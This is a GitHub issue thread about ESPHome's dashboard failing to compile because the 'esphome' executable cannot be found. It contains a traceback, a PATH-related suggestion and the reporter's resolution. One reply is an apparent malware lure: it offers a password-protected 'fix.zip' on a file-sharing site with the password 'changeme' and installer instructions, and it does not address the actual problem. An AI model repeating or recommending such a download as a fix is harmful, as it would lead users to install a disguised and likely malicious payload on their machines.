esphome/issues #6208: Problems occur when running the build via the dashboard

CCChelios, 2024-08-28:
### The problem

I do everything according to the instructions from https://esphome.io/guides/contributing.html#setting-up-a-development-environment
clone, install, activate the environment, launch task run dashboard. In browser I add a new device, click install manual installation, nothing is displayed in the log in the browser, and in the console where the dashboard is running there is an error.

### Which version of ESPHome has the issue?

2024.8.1

### What type of installation are you using?

pip

### What platform are you using?

ESP32

### Board

nodemcu

### Example YAML snippet

```yaml
esphome:
  name: test
  friendly_name: test

esp32:
  board: esp32dev
  framework:
    type: esp-idf

# Enable logging
logger:
```

### Anything in the logs that might be useful for us?

```txt
Executing task: /mnt/c/esp/esphome/venv/bin/python -m esphome dashboard config/ 

2024-08-28 10:45:54,238 INFO Starting dashboard web server on http://0.0.0.0:6052 and configuration dir config/...
2024-08-28 10:45:57,608 INFO 304 GET /devices (127.0.0.1) 1.14ms
2024-08-28 10:46:02,332 INFO 304 GET /info?configuration=test.yaml (127.0.0.1) 1.67ms
2024-08-28 10:46:02,619 INFO 304 GET /devices (127.0.0.1) 0.91ms
2024-08-28 10:46:03,520 INFO 101 GET /compile (127.0.0.1) 0.34ms
2024-08-28 10:46:03,527 INFO Running command 'esphome --dashboard compile config/test.yaml'
2024-08-28 10:46:03,536 ERROR Exception in callback functools.partial(<function WebSocketProtocol._run_callback.<locals>.<lambda> at 0x7fd6976dd3f0>, <Task finished name='Task-18' coro=<EsphomeCommandWebSocket.on_message() done, defined at /mnt/c/esp/esphome/esphome/dashboard/web_server.py:188> exception=FileNotFoundError(2, 'No such file or directory')>)
Traceback (most recent call last):
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/ioloop.py", line 750, in _run_callback
    ret = callback()
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 640, in <lambda>
    self.stream.io_loop.add_future(result, lambda f: f.result())
  File "/mnt/c/esp/esphome/esphome/dashboard/web_server.py", line 202, in on_message
    await handlers[type_](self, json_message)
  File "/mnt/c/esp/esphome/esphome/dashboard/web_server.py", line 225, in handle_spawn
    self._proc = tornado.process.Subprocess(
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/process.py", line 240, in __init__
    self.proc = subprocess.Popen(*args, **kwargs)
  File "/usr/lib/python3.10/subprocess.py", line 971, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "/usr/lib/python3.10/subprocess.py", line 1863, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'esphome'
2024-08-28 10:46:03,539 ERROR Uncaught exception GET /compile (127.0.0.1)
HTTPServerRequest(protocol='http', host='localhost:6052', method='GET', uri='/compile', version='HTTP/1.1', remote_ip='127.0.0.1')
Traceback (most recent call last):
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/web.py", line 1790, in _execute
    result = await result
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 273, in get
    await self.ws_connection.accept_connection(self)
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 863, in accept_connection
    await self._accept_connection(handler)
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 946, in _accept_connection
    await self._receive_frame_loop()
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 1102, in _receive_frame_loop
    await self._receive_frame()
  File "/mnt/c/esp/esphome/venv/lib/python3.10/site-packages/tornado/websocket.py", line 1193, in _receive_frame
    await handled_future
FileNotFoundError: [Errno 2] No such file or directory: 'esphome'
2024-08-28 10:46:08,156 INFO 304 GET /devices (127.0.0.1) 0.78ms
2024-08-28 10:46:14,163 INFO 304 GET /devices (127.0.0.1) 1.00ms
2024-08-28 10:46:20,150 INFO 304 GET /devices (127.0.0.1) 0.94ms
```

### Additional information

the problem occurs both in wsl and in ubuntu 24.04

chenkeyu123, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sinh64, 2024-09-23:
Try adding path to esphome binary into your PATH settings.

CCChelios, 2024-09-23:
yes, rather what problems with paths. I reinstalled everything and it worked for me.

closed 2024-09-23 by CCChelios